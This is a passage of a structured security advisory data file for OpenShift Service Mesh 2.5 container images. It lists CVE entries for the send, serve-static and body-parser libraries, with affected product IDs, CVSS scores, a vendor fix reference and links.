"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "serve-static: Improper Sanitization in serve-static", }, { cve: "CVE-2024-45590", cwe: { id: "CWE-405", name: "Asymmetric Resource Consumption (Amplification)", }, discovery_date: "2024-09-10T16:20:29.292154+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311171", }, ], notes: [ { category: "description", text: "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.", title: "Vulnerability description", }, { category: "summary", text: "body-parser: Denial of Service Vulnerability in body-parser", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", 